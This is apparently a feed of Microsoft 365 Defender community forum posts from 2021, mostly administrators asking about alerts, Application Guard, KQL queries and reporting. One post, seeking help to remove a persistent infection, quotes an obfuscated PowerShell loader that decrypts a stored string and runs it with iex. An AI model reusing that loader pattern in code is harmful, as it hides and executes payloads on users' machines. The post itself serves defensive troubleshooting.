Microsoft 365 Defender topics Microsoft 365 Defender topics Wed, 27 Oct 2021 23:28:02 GMT MicrosoftThreatProtection 2021-10-27T23:28:02Z WDAG - Microsoft Defender Application Guard for Office - No Attachment protection <P>After trying on <A href="#" target="_blank" rel="noopener">Reddit</A>, Let's try to find an answers here.&nbsp;</P><P>&nbsp;</P><P>I've enabled Microsoft Defender Application Guard for Office for a few test devices/users in our organisation.</P><P>&nbsp;</P><P>I've used Microsoft Endpoint Manager / Endpoint Security for this:</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-19 201611.png" style="width: 689px;"><img src=";px=999" role="button" title="Screenshot 2021-10-19 201611.png" alt="Enable MDAG for Office (not for Edge)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Enable MDAG for Office (not for Edge)</span></span><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-19 201648.png" style="width: 690px;"><img src=";px=999" role="button" title="Screenshot 2021-10-19 201648.png" alt="Add the network Rules (hidden company specific url parts)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Add the network Rules (hidden company specific url parts)</span></span><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-19 201854.png" style="width: 688px;"><img src="" width="688" height="697" role="button" title="Screenshot 2021-10-19 201854.png" alt="Neutral resources (hidden company url)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Neutral resources (hidden company url)</span></span></P><P>&nbsp;</P><P>This configuration works great for Downloads, but doesn't trigger on opening Outlook attachments.</P><P>&nbsp;</P><P>After a lot of searching, I've found the Microsoft Word Trust Center and the tick for Enable Application Guard for Outlook Attachments is off (and greyed out).</P><P>&nbsp;</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-20 152549.png" style="width: 824px;"><img src=";px=999" role="button" title="Screenshot 2021-10-20 152549.png" alt="Enable Application Guard for Outlook Attachments greyed out" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Enable Application Guard for Outlook Attachments greyed out</span></span></P><P>&nbsp;</P><P>How can I make sure this will be turned on?</P><P>&nbsp;</P><P>Related question 2: Is it possible that this is because I have Safe documents on?</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-21 111435.png" style="width: 609px;"><img src=";px=999" role="button" title="Screenshot 2021-10-21 111435.png" alt="Screenshot 2021-10-21 111435.png" /></span></P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P> Thu, 21 Oct 2021 09:26:51 GMT molislaegers 2021-10-21T09:26:51Z Microsoft Defender Endpoint Application Control Policies <P>Hi all,</P><P>&nbsp;</P><P>I would like to find out if MDE application control is capable of the following and how they can be implemented (Im not expecting all to be answered):-</P><P>&nbsp;</P><UL><LI><P>Monitoring of process launch attempts</P></LI><LI><P>Can processes be block</P></LI><LI><P>Can processes be defined by fingerprint/hash</P></LI><LI><P>Process exclusion based on argument regex string</P></LI><LI><P>File read/create/delete/write attempt monitoring</P></LI><LI><P>Is DLL Load monitoring possible</P></LI><LI><P>Can processes be monitored whilst allowing further rules to be analyzed (continue processing other rules)</P></LI><LI><P>Can log events including severity</P></LI><LI><P>Can notify user of policy actions</P></LI><LI><P>Can processes be monitored based on wildcard expressions</P></LI></UL><P>Any help is much appreciated, thank you.</P> Wed, 20 Oct 2021 08:08:47 GMT Peter_Lane 2021-10-20T08:08:47Z I am trying to find all occurrences of protected health information (PHI) in Tenant <P>Great content in your Advanced Hunting series.&nbsp; This may be outside of scope but is it possible to scavenge for PHI within Microsoft 365 using Advanced Hunting or might that be a completely different tool set?&nbsp; I do see some information on SensitivityLabel and etc. in DeviceFileEvents; however, we have not yet classified our data yet -- this has to do with preparing to classify by first identifying where sensitive data resides.&nbsp; Thanks!</P> Fri, 15 Oct 2021 20:11:45 GMT This_Guy_be_Me 2021-10-15T20:11:45Z Clone or update Default Alert Policy <P>Hi,</P><P>I'm looking for the best way to extend the email recipients on a default alert policy.</P><P>&nbsp;</P><P>The alert policy is "User restricted from sending email", and the GUI doesn't allow for adding additional email recipients.</P><P>&nbsp;</P><P>Is there a way to clone that policy?&nbsp; I don't see anyway to do that.</P><P>&nbsp;</P><P>How could I create my own version of this policy?&nbsp; I couldn't see how to replicate it.&nbsp; None of the "Activity" options correlate to what's seen on the interface.</P><P>&nbsp;</P><P>I looked at Azure Active Directory to see if there were any audit logs I could pull from there, but again, I don't see anything in AAD that could help correlate.</P><P>&nbsp;</P><P>Ideally I'd like to clone the Alert Policy in Office 365 Security &amp; Compliance, does anyone have any ideas on how to go about this?</P><P>&nbsp;</P><P>Thanks</P><P>Mike</P> Fri, 15 Oct 2021 17:32:29 GMT no-va 2021-10-15T17:32:29Z JCS Enterprises LLC, Copyright license(2021) ,Patrick Rene Guerrero JCS Enterprises LLC<BR />Patrick Rene Guerrero<BR />CEO/OWNER<BR />"Dream It,Believe It,Achieve It"<BR />email:,<BR /><A href="#" target="_blank"></A> Wed, 13 Oct 2021 01:44:53 GMT patrickreneguerrero 2021-10-13T01:44:53Z Trying to suppress an alert, no option <P>Hello,</P><P>We have a basic alert in Defender that informs us if a change in email forwarding has been made for a certain level of user. This is important to know, but about 3/4th of these are triggered when our system automatically sets up an email address for a new user, or a user switching departments. These are known and the alerts are just noise. I am looking for a way to auto-resolve these. We were looking at using the suppression rule option, but for these alerts this isn't an option. I think it might have to do with being an informational alert as opposed to a compromise, but we just want to filter out a specific username that indicates it is our internal system.</P><P>&nbsp;</P><P>Does anyone know if a way we can get this done? Is there another option without completely turning off this alert all together?</P><P>&nbsp;</P><P>Thank you</P> Mon, 11 Oct 2021 21:55:22 GMT zrvirgo 2021-10-11T21:55:22Z Microsoft Defender 365 Alert issue <P>Hi,</P><P>&nbsp;</P><P>I need some help clarifying some Logs I'm looking at.</P><P>I got an incident registered on Microsoft 365 Defender, which the source is Endpoint and the incident description is:&nbsp;Successful logon from known brute-force source on one endpoint.</P><P>So I got the investigation package from the machine and found out looking at the Logs that there is a Brute Force attempt, which was successful on one user, from an external IP, which is not even the user which is using the machine usually.<BR />I also got the security log from the machine itself and can see the event ID 4624 on the domain user, with logon type 3 (network logon), from the external IP.<BR />So my question is, being the logon from an external IP, what are the possible circumstances that an external IP is doing a brute force on a specific machine on my network?<BR />Does this mean that this machine is compromised and being used for lateral movement?<BR />Or any other plausible explanation for a network logon being done from an external IP?</P><P>&nbsp;</P><P>Thanks</P> Thu, 07 Oct 2021 15:41:19 GMT dmarquesgn 2021-10-07T15:41:19Z Compressed files scan depth <P>Hi everyone,</P><P><A href="#" target="_blank"></A></P><P>&nbsp;</P><P>The documentation for Defender for O365 is a bit vague. I've been looking for an answer, but I hope one of you might have the answer.</P><P>The question is how many layers Defender is able to scan and the answer is "...<SPAN>recursive scanning of compressed files scans many layers deep."</SPAN></P><P>&nbsp;</P><P><SPAN>So how many layers is many&nbsp;<img class="lia-deferred-image lia-image-emoji" src="" alt=":smile:" title=":smile:" /></SPAN></P><P>&nbsp;</P> Fri, 08 Oct 2021 13:43:20 GMT mib76 2021-10-08T13:43:20Z Microsoft 365 Defender integration with Azure Sentinel <P>Hi,</P><P>I understand that this feature is currently in preview, integrating the entire Defender 365 Suite into Sentinel and supporting&nbsp;<SPAN>bi-directionally sync.</SPAN></P><P><SPAN>Prior to this, my understanding was to route all the alerts via MCAS to avoid duplicate ID issues for example with Defender for Identity:&nbsp;</SPAN></P><P><SPAN>************</SPAN></P><P><SPAN>If both your services (Defender for Identity and Cloud App Security) are currently configured to send alert notifications to a SIEM, after enabling Defender for Identity integration in Cloud App Security, you'll start to receive duplicate SIEM notifications for the same alert. One alert will be issued from each service and they'll have different alert IDs. To avoid duplication and confusion, decide where you intend to perform alert management, and then stop SIEM notifications being sent from the other service.</SPAN></P><P><SPAN>************</SPAN></P><P><SPAN>Another benefit was with integrating Defender for Endpoint with MCAS to then have the ability for Cloud App Discovery to sanction/un-sanction apps, then there was the integration of Defender for Identity with Defender for Endpoint.</SPAN></P><P>&nbsp;</P><P><SPAN>I guess what I'm trying to work out is that once we start using the new 365 Defender connector to Sentinel, what do we need to change in all the integrations we have setup with all the Defender suite pointing to MCAS?&nbsp;(also data ingestion cost savings come into play, when alerts directed to MCAS first)</SPAN></P><P><SPAN>The only thing I read was that you need to be aware of the incident creation rules and the need to delete them in 365 Defender to avoid duplicates, if also using in Sentinel.</SPAN></P><P>&nbsp;</P><P><SPAN>Secondly, Am I correct to assume that all the 365 Defender Suite alerts will be at no charge?</SPAN></P><P>&nbsp;</P><P><SPAN>Lastly, there is a note on top of all this stating "All Microsoft Cloud App Security alert types are now being onboarded to Microsoft 365 Defender" What would be great is a Best Practice 365 Defender integration guide. As there are so many portals that can be logged into.</SPAN></P><P>&nbsp;</P><P><SPAN>Thanks</SPAN></P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P> Mon, 04 Oct 2021 14:45:23 GMT AmjadGov 2021-10-04T14:45:23Z How to quickly react to a user reported phishing e-mail? <P>When a user reports an e-mail as phishing I receive an alert notification, which leads me to the Incident page in Microsoft 365.</P><P>&nbsp;</P><P>- How can I find similar e-mails on that page in case any other users received the same phsihing mail?</P><P>&nbsp;</P><P>- How can I quickly delete those mails?</P> Thu, 23 Sep 2021 09:42:58 GMT Kiril Valev 2021-09-23T09:42:58Z Understanding the different reports in MDE <P>Hello, I'm new to working in Microsoft Defender and Endpoint and trying to understand some of the reports.&nbsp;<BR /><BR />If I navigate to&nbsp;<A href="#" target="_blank" rel="noopener">Reports - Microsoft 365 security</A>&nbsp;and click on the predefined "Security report" my main questions are under the "Devices" section.&nbsp;<BR /><BR />When I was looking I saw that the report said "Devices with Active Malware" had 1 device with 1 active malware.&nbsp;</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Aireal_2-1632166557440.png" style="width: 400px;"><img src=";px=400" role="button" title="Aireal_2-1632166557440.png" alt="Aireal_2-1632166557440.png" /></span></P><P><BR />But then there is also a part that says "Malware on devices" and there were like 21 line items<BR /><BR /></P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Aireal_3-1632166591122.png" style="width: 400px;"><img src=";px=400" role="button" title="Aireal_3-1632166591122.png" alt="Aireal_3-1632166591122.png" /></span></P><P>&nbsp;</P><P><BR />However, I can't find any more information about the 21 malware items. They don't tell me the device name. I'm just confused as to what this is.&nbsp;<BR /><BR /><BR /></P> Tue, 21 Sep 2021 13:44:28 GMT Aireal 2021-09-21T13:44:28Z User restricted from sending email false positive <P>We have an email address that keeps getting blocked from sending emails with the alert saying "<STRONG>User has been restricted from sending messages outside the organization due to potential compromised activity.</STRONG>" This is a false positive and the email address keeps getting blocked after unblocking. What action should I take to not let this happen again without removing protection?</P><P>&nbsp;</P><P>Thank you</P> Wed, 15 Sep 2021 17:14:43 GMT tk298 2021-09-15T17:14:43Z Windows Defender issue <P>I want to open up windows defender but this keeps showing up.</P> Sat, 11 Sep 2021 00:32:36 GMT BLUEMLG 2021-09-11T00:32:36Z Microsoft 365 Defender Portal - ASR Report <P>To whom it may concern,</P><P>&nbsp;</P><P>Somebody high up in Microsoft connected with the above mentioned portal needs to look at the detection process for ASR and the report.</P><P>&nbsp;</P><P>It is inaccurate, and although I have no doubt that the offending ASR rule being vulnerable drivers will eventually be added to SC or the templates within the appropriate sections of MEM or that these can be implemented via ADMX it sort of makes the appropriate section of the MEM portal obsolete, as its not a complete solution.&nbsp;&nbsp;</P><P>&nbsp;</P><P>In fact I would go so far as to say that the Endpoint Security section of MEM is a botch.&nbsp; It is designed for Enterprise but this is not what this post is about, nor the conflicts that may result from the security baselines, SC policies, and so on.&nbsp; Microsoft MEM portal needs some work but that is IMHO.</P><P>&nbsp;</P><P>Please note that I am a hobbyist but I do pay as does everyone for these reports and I have had to go to some lengths to prove that the attached report is incorrect (all my PCs are fully ASR compliant), as I have a script which pulls the ASR entries out of the registry, compiles them, and then annotates a file to the PC which I can then pull via live response (yes I am aware of diagnostics - but that only works on corporate devices not BYO).&nbsp; So I know that all 16 rules are applied, no matter the implementation, on all devices whether BYO or corporate.</P><P>&nbsp;</P><P>Even some of the hunting scripts I see that are written by MVP's and those in the pentesting fraternity (blue, red or purple) are incomplete, as they don't fully take into account all the registry entries involved or the various operating systems.&nbsp; In a perfect world every body would be running Windows 10 or soon Windows 11 Enterprise but this is not the case.</P><P>&nbsp;</P><P>Can somebody please fix the ASR Report in M365 Defender Portal to reflect the true nature of endpoints not what is implemented via MSDE controls or to be exact this registry entry,</P><P>&nbsp;</P><P>HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager\ASRRules</P><P>&nbsp;</P><P>As I am pretty sure after investing some time, that this is how the report bases its results</P><P>&nbsp;</P><P>I have further work to do on Controlled Folder Access and Windows Defender exemptions but this is well posted about on LinkedIn and other media by people much smarter and with more time than me,</P><P>and I will eventually add more Ninja training to my resume but I appreciate a great deal that Ninja training is even available and the time that must be invested by individuals to make it so.</P><P>&nbsp;</P><P>Thankyou for reading and consider this feedback that I regard highly important in a dangerous world.</P><P>&nbsp;</P><P>Thanks.</P><P>Leon Scott</P><P>(constantly learning, interested and loves IT)</P><P>&nbsp;</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="2021-09-12 (2).png" style="width: 999px;"><img src=";px=999" role="button" title="2021-09-12 (2).png" alt="2021-09-12 (2).png" /></span></P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P> Sun, 12 Sep 2021 08:43:43 GMT braedachau 2021-09-12T08:43:43Z Defender outdated client, but correct engine and definitions for latest release <P>Hello,</P><P>After getting access denied to do a GPO backup, then a system restore crashing at restart, and finally the only boot recovery option that worked was Reset,&nbsp; Defender reports&nbsp;Client 4.18.1909.6 even though it was previously Client 4.18.2011.6 before the crash.&nbsp;&nbsp;Engine: 1.1.18500.10 and the current antivirus/antimalware match for the latest version at&nbsp;<A href="#" target="_blank">;view=o365-worldwide</A></P><P>My coworker has the same laptop, and when he updates, he only gets Platform: 4.18.2107.4, instead of the latest Platform: 4.18.2108.7, but engine and definitions are correct.</P><P>&nbsp;</P><P>We are both on Windows 10 version 21H1 Build 19043.1165.</P><P>Windows Security app settings report 10.0.19041.964 for my laptop and .1024 for his.</P><P>&nbsp;</P><P>I used DISM and SFC to correct some files after the reset with an ISO (21H1 Build 19043, but less than 1165).&nbsp; I also applied additional MPAM-FE from&nbsp;<A href="#" target="_blank"></A>&nbsp;, but it did not repair the platform.</P><P>&nbsp;</P><P>I tried the options at</P><P><A href="#" target="_blank"></A></P><P>&nbsp;</P><P>Option 1 and then MPAM-FE.exe update did not fix the platform<BR />Option 2 is only available in Windows 10 Insider Preview Build 20175 or higher</P><P>Option 3 - did not like &amp;, without &amp;, it did not like -Command</P><P>&nbsp;</P><P>Is there another method to reset or reinstall defender?</P><P>Can the appxpackage be reinstalled from the Win10 ISO?</P><P>&nbsp;</P><P>Thank you,</P><P>Nick</P> Fri, 10 Sep 2021 18:21:15 GMT Nickwork 2021-09-10T18:21:15Z URL Clic API for MDO ? Hello everyone,<BR />TL;DR : is it a MDO SafeLinks API, or a Microsoft 365 Defender where we can check whether a URL has been clicked or not?<BR /><BR />I'm a security officer, working with Azure sentinel and logic apps. I frequently receive security incidents where I have to investigate if users accessed bad URLs.<BR />I want too automate this a bit and set up a logic app for that.<BR />Do you know if there is any documentation on this (and if this feature is available)? Fri, 10 Sep 2021 05:57:44 GMT jeffazure 2021-09-10T05:57:44Z Need help with suspicious "Behavior:Win32/SuspCopy.B" <P>Hello,</P><P>the system of a colleague is trying to block various attempt of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus block it but after some times it find it again; the threath create a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time that the antivurs find a new attempt, a pop up shows that a particular .tmp files is not found: the pop up is a wsh pop up and I suppose a vbscript is executed when there is this issue.</P><P>One of the file that I have found is a powershell script like this:<BR /><BR /></P><LI-CODE lang="powershell">try{Import-Certificate:Import-StartLayout Get-PSSessionConfiguration:Import-BinaryMiLog Unregister-UevTemplate:Set-AppvPublishingServer}catch{ $kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi"; try{Add-AppxPackage:Enable-PSBreakpoint Invoke-CommandInDesktopPackage:Get-RunspaceDebug Clear-UevConfiguration:Debug-Process}catch{} $NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"}; if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){ $pAWzZWnnbaODWSIlGcI=@(1..16); $wXXale=[System.Runtime.InteropServices.Marshal] $FJZARstrPhaUvJ= Get-Content "" $BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI; $qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu); try{Show-EventLog:Get-WheaMemoryPolicy Get-NonRemovableAppsPolicy:Set-AppLockerPolicy Set-AppxDefaultVolume:Disable-PSSessionConfiguration}catch{$upd='iXxpLQjg';} $zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW); try{Write-Host:Publish-AppvClientPackage Set-LocalUser:Invoke-WmiMethod Set-WmiInstance:New-WindowsImage}catch{} $zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}</LI-CODE><P>I also tried to do a scan with Microsoft Security Scanner but without a success.</P><P>Has someone any idea how I could eradicate this threath?</P><P>&nbsp;</P><P>--</P><P>Regards</P> Wed, 08 Sep 2021 14:07:36 GMT Marco Mangiante 2021-09-08T14:07:36Z 'Zero Width Space' appended to Microsoft 365 Defender Alert <P>TLDR:&nbsp;The M365 Defender alert "Email messages containing malicious URL removed after delivery" has a hidden non-printable character at the end of the alert, the Zero-Width Space (ZWSP) character.</P><P>&nbsp;</P><P>I was working to implement the SocRA Watchlist by&nbsp;<LI-USER uid="512377"></LI-USER>&nbsp;in Sentinel and was eager to extend the included list with a few simple remediation steps. Luckily for this post the very first alert I chose to extend has a hidden non-printable character, the Zero-Width Space (ZWSP) character.</P><P>&nbsp;</P><P>After significant head scratching on why my watchlist was not triggered for the alert I found that: "Email messages containing malicious URL removed after delivery​"&nbsp;<SPAN>has the non-printable character after the 'y' in delivery. I have copied the alert title in both Chrome and Edge as well as 2 Azure tenants and the ZWSP character is consistent.</SPAN></P><P>&nbsp;</P><P><SPAN>You can test this yourself by searching for the alert and copying the full title and running the below code which converts the string to its decimal unicode equivalent:</SPAN></P><P>&nbsp;</P><LI-CODE lang="powershell">$string = "Email messages containing malicious URL removed after delivery​" $string -split '' | %{[int][char]$_}</LI-CODE><P>&nbsp;</P><P>You should see the final output&nbsp; as below:</P><P>&nbsp;</P><LI-CODE lang="powershell">101 114 121 8203</LI-CODE><P>&nbsp;</P><P>The '8203' being the ZWSP character where '121' is 'y'.&nbsp;</P><P>&nbsp;</P><P>It would be great to have this confirmed by other users and remediated by the relevant MS team. While knowing about it one can simply include the ZWSP in relevant watchlists or automation it's going to bite at some point.</P><P>&nbsp;</P><P>Thanks.</P> Wed, 08 Sep 2021 05:07:23 GMT UCDWraith 2021-09-08T05:07:23Z Splunk integration ATP Defender <P>Hello,</P><P>we are looking at Microsoft 365 ATP Defender and we are struggling with the integration with Splunk due some missing fields in the logs, did anyone was succesful to do this?</P><P>Thank you!<BR />RS</P> Tue, 07 Sep 2021 12:29:45 GMT rs8091 2021-09-07T12:29:45Z How to block a file type? <P>I am looking to block the download of certain type, namely APK files.<BR /><BR />Is there a way to block files in Defender?</P> Tue, 24 Aug 2021 14:16:33 GMT Mattsharkey 2021-08-24T14:16:33Z Microsoft 365 Defender Pop Up <P>Microsoft 365 Defender Pop Up</P><P>&nbsp;</P><P>Is their a way to disable the pop up on&nbsp;Microsoft 365 Defender Cloud Portal.</P><P>&nbsp;</P><P>Everytime I login I have to click through or close whats new in&nbsp;Microsoft 365 Defender</P><P>&nbsp;</P><P>I looked for a setting, but unable to find the disable feature on new features and the click through and closes.</P> Mon, 16 Aug 2021 16:19:07 GMT roger_jr 2021-08-16T16:19:07Z Microsoft Secure Score - Recently introduced issues <P>Hi,</P><P>&nbsp;</P><P>With the recent updates to&nbsp;Microsoft 365 Defender (<A href="#" target="_blank"></A>&nbsp;we have noticed Edge critical updates are no longer being flagged on the "Exposure score over time".&nbsp; Also at the same time this started to occur all devices are showing two Edge entries under the device "Software Inventory" tab (old and newly installed version) and it's now taking three to five days to process (remove old\process new) and mark this devices as updated. In the past the two versions showed for a maximum of 24 hours (at the quickest they cleared within 4 hours), this is now three to five days.&nbsp;&nbsp;</P><P>&nbsp;</P><P>We have also noted the three newly added Teams Security Score checks have not been synced since&nbsp;<SPAN>7/30/2021. Prior to the new items being added the one Teams improvement (Restrict anonymous users from starting Teams meetings) was being scanned every 24 to 48 hours. As of this post its now 9 days since the last scan.</SPAN></P><P>&nbsp;</P><P><SPAN>I hoping we can speak with someone from the MS Security Team as we have just about maxed out the security score and security recommendations&nbsp;and we have noted a very large number of bugs.</SPAN></P><P>&nbsp;</P><P><SPAN>Thanks,</SPAN></P><P>&nbsp;</P><P><SPAN>Gary</SPAN></P> Sun, 08 Aug 2021 07:04:45 GMT GaryCutri 2021-08-08T07:04:45Z Need to check upload activity from edge <P>Hi Team&nbsp;</P><P>&nbsp;</P><P>I'm trying to monitor all the upload activity from the edge browser to another Cloud.&nbsp;</P><P>&nbsp;</P><P>Can it be possible to check via advance hunting query&nbsp;@</P> Fri, 06 Aug 2021 07:18:22 GMT Nayan007 2021-08-06T07:18:22Z I have no permission to view Firewall report <P>Hi<BR />I am trying to test <A title="Host firewall reporting in Microsoft Defender for Endpoint" href="#" target="_blank" rel="noopener">Host firewall reporting in Microsoft Defender for Endpoint</A>&nbsp;function.</P><P>&nbsp;</P><P>First, I enable "Audit Filtering Platform Packet Drop" and "Audit Filtering Platform Connection" events.</P><P>After it, when I open&nbsp;<A href="#" target="_blank" rel="noopener">firewall report pages</A>, it tell me "Sorry, you have no permission to view it."</P><P>&nbsp;</P><P>I am Security admin, Security reader, Security operator already.</P><P>What permission I have?</P> Thu, 05 Aug 2021 06:35:54 GMT KevinLin 2021-08-05T06:35:54Z Azure AD Registered Device Showing as vulnerable in Defender Portal ( <DIV class="bi6gxh9e"><DIV class="_1mf _1mj"><SPAN>Hi </SPAN><SPAN>All</SPAN><SPAN>&nbsp;</SPAN></DIV></DIV><DIV class="bi6gxh9e"><DIV class="_1mf _1mj"><SPAN>We have some devices showing in our Defender Endpoints portal ( that are not enrolled in our Intune environment. I am wondering </SPAN></DIV></DIV><OL class="kvgmc6g5 cxmmr5t8 oygrvhab hcukyx3x jb3vyjys rz4wbd8a qt6c0cv9 a8nywdso"><LI><DIV class="_1mf _1mj"><SPAN>Why is the device showing in the Defender portal? The device is Azure AD Registered but not MDM enroled.</SPAN></DIV></LI><LI><DIV class="_1mf _1mj"><SPAN>How do we remove the device from showing in this portal safely without removing it from Azure AD?</SPAN></DIV></LI></OL><DIV class="bi6gxh9e"><DIV class="_1mf _1mj"><SPAN>Thanks </SPAN></DIV></DIV> Wed, 04 Aug 2021 15:17:31 GMT ICB2022 2021-08-04T15:17:31Z Identify a device on Device Inventory <P>Hi,</P><P>My team members installed Microsoft Defender for Endpoint for each PC (Windows / Mac ).</P><P>I can see most devices on the page 'Device inventory' in Microsoft Defender Security Center <A href="#" target="_blank"></A>.</P><P>&nbsp;</P><P>But some PCs have the same device name such as "Windows 10" or "MacBook-Pro" and also "Logged on users" the username does not appear. As a result, it is not possible to determine which PC is being used by whom. The Device Inventory does not show the serial number of the device, so I have no other way to distinguish between them.</P><P>&nbsp;</P><P>Do I have to buy MS Intune license to distinguish them?</P><P>Is there any way to identify each PC ?</P><P>Best regards,</P> Thu, 17 Jun 2021 07:32:02 GMT tarosrcm 2021-06-17T07:32:02Z Can we change severity of "Detection Source" in microsoft atp <P>Hi Guys,</P><P>Can we change severity of "Detection Source" in microsoft atp.</P><P>Example: for any custom detection rule I can set severity by editing the detection rule. can we change the same for alert triggered by detection source like antivirus</P> Fri, 09 Jul 2021 12:38:57 GMT Sheri97 2021-07-09T12:38:57Z Unsupported alerts <P>Can anyone tell me why the Investigation state for some alerts from MCAS show up in M365 Defender as "unsupported alerts" ?</P> Wed, 14 Jul 2021 11:01:36 GMT Dean Gross 2021-07-14T11:01:36Z Disassociate a incorrectly linked set of alerts that forma an incident <P>Morning all&nbsp;</P><P>In M365D - when a series of alerts create two distinct incidents - there is clearly a way of adding "linked incidents" to an existing incident - is there a way of Un-Linking or Disassociating an incorrectly linked set of alerts that form an incident.&nbsp; &nbsp; See image attached.&nbsp; many thanks&nbsp;</P> Thu, 08 Jul 2021 09:01:36 GMT wootts 2021-07-08T09:01:36Z Review Allowed/blocked IP List Items <P>After we have added IP addresses to the list, how can we review what is in that list? Where is the data stored?</P> Tue, 22 Jun 2021 12:37:46 GMT Dean Gross 2021-06-22T12:37:46Z Getting issue on fqdn confirmation <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="sprazapati_0-1624346518744.png" style="width: 400px;"><img src=";px=400" role="button" title="sprazapati_0-1624346518744.png" alt="sprazapati_0-1624346518744.png" /></span></P><P>&nbsp;</P> Tue, 22 Jun 2021 07:22:25 GMT sprazapati 2021-06-22T07:22:25Z How to migrate mailboxes in hybrid environment <P>I have configure Azure AD connect and Hybrid wizard. After that what are the step that for migrate the mailboxes.</P> Mon, 21 Jun 2021 18:43:47 GMT sprazapati 2021-06-21T18:43:47Z Web content filter or Web protection <P>Hi,</P><P>I am looking for a way to report on web browsing activity on a user level in Microsoft defender security center Web Protection.</P><P>Has anyone achieved this successfully?&nbsp; ie reporting on per user web browsing activity?</P><P>Thank you in advance.</P> Mon, 14 Jun 2021 14:56:37 GMT KojoOsiris 2021-06-14T14:56:37Z Adding custom Threat Intelligence feeds to M365 Defender <P>Are there any methods for adding TI feeds to M365 like we can do for Azure Sentinel?</P> Thu, 10 Jun 2021 15:48:08 GMT Dean Gross 2021-06-10T15:48:08Z Tutorials for Defender products <P>There is a series of tutorials for conducting investigations for Defender for Identity,&nbsp;<A href="#" target="_blank">Microsoft Defender for Identity reconnaissance phase security alerts | Microsoft Docs</A>&nbsp;that are very helpful. I really like the way that the information is presented and suggested remediation steps are provided.&nbsp;</P><P>&nbsp;</P><P>The MDI approach seems easier to follow that the investigation instructions provided for Defender for Office 365&nbsp;<A href="#" target="_blank">Investigate malicious email that was delivered in Office 365, Find and investigate malicious email - Office 365 | Microsoft Docs</A> and Defender for Endpoint&nbsp;<A href="#" target="_blank">Investigate incidents in Microsoft Defender for Endpoint | Microsoft Docs</A></P><P>&nbsp;</P><P>What do other people think?</P><P>&nbsp;</P><P>&nbsp;<LI-USER uid="63582"></LI-USER>&nbsp;it would be great if the MDO and MDE teams could use the same approach as MDI</P> Sat, 29 May 2021 20:38:30 GMT Dean Gross 2021-05-29T20:38:30Z KQL Date between range not working <P>Due to the 10,000 row limit within KQL, we are working with running scan for just specific time ranges.&nbsp;&nbsp;</P><P>&nbsp;</P><P>Query:&nbsp;</P><P>IdentityLogonEvents</P><P>| where LogonType == "Failed logon" and isnotempty(AccountName)</P><P>| project LogonTime = Timestamp, LogonType, Application, FailureReason, AccountName, AccountUpn, DeviceName, DestinationDeviceName</P><P>| where Timestamp between (datetime(2021-5-02)..datetime(2021-5-03))</P><P>&nbsp;</P><P>However the datetime is not working correctly, we still get what ever the option is selected in the gui.&nbsp; When I test this in the lademo area, I get "Set in query".&nbsp;&nbsp;</P><P>&nbsp;</P><P>Any help/advice on how to get the date range to work in query?</P><P>&nbsp;</P><P>Also, it's odd how the 10,000 limit is not in a row.&nbsp; For example, if we did 5/5 - 5/8 and we limited out, we will get results for all dates but not all the data.</P><P>&nbsp;</P><P>Cheers,</P> Wed, 19 May 2021 16:01:51 GMT snteran 2021-05-19T16:01:51Z Announcing an important behavior change for MDE's Endpoint Discovery <DIV class="lia-message-subject-wrapper lia-component-subject lia-component-message-view-widget-subject-with-options">&nbsp;</DIV><DIV class="lia-message-body lia-component-message-view-widget-body lia-component-body-signature-highlight-escalation lia-component-message-view-widget-body-signature-highlight-escalation"><DIV class="lia-message-body-content"><P>On April 6th we announced the public preview of Endpoint Discovery which enables Microsoft Defender for Endpoint to discover unmanaged workstations, servers and mobile devices, (Windows, Linux, macOS, iOS, and Android) on their business networks. Based on customer feedback we are switching the discovery functionality from a passive to active mode on Monday May 10th. This will enable Endpoint Discovery to automatically discover a more complete inventory of unmanaged endpoints.</P><P>&nbsp;</P><P>With this change there are two matters that public preview customers may experience. The first is related to the discovery of a potentially much larger inventory of unmanaged endpoints. Those who are trialing Defender for Endpoint will notice this the most and are likely to see their Device Inventory grow from a small handful of unmanaged endpoints to 1000s or more depending on the size of their organization. A new<SPAN>&nbsp;</SPAN><STRONG>Onboarding status</STRONG><SPAN>&nbsp;</SPAN>column has been added to the Device Inventory view to help them differentiate between unmanaged and managed devices. Also filtering capabilities have been added if they wish to hide unmanaged devices from view.</P><P>&nbsp;</P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ChrisHallum_0-1620506059907.png" style="width: 400px;"><img src=";px=400" role="button" title="ChrisHallum_0-1620506059907.png" alt="ChrisHallum_0-1620506059907.png" /></span><P>&nbsp;</P><P>&nbsp;</P><P>The second issue customers may experience is when 3rd party threat detection and response systems (e.g.: EDR, 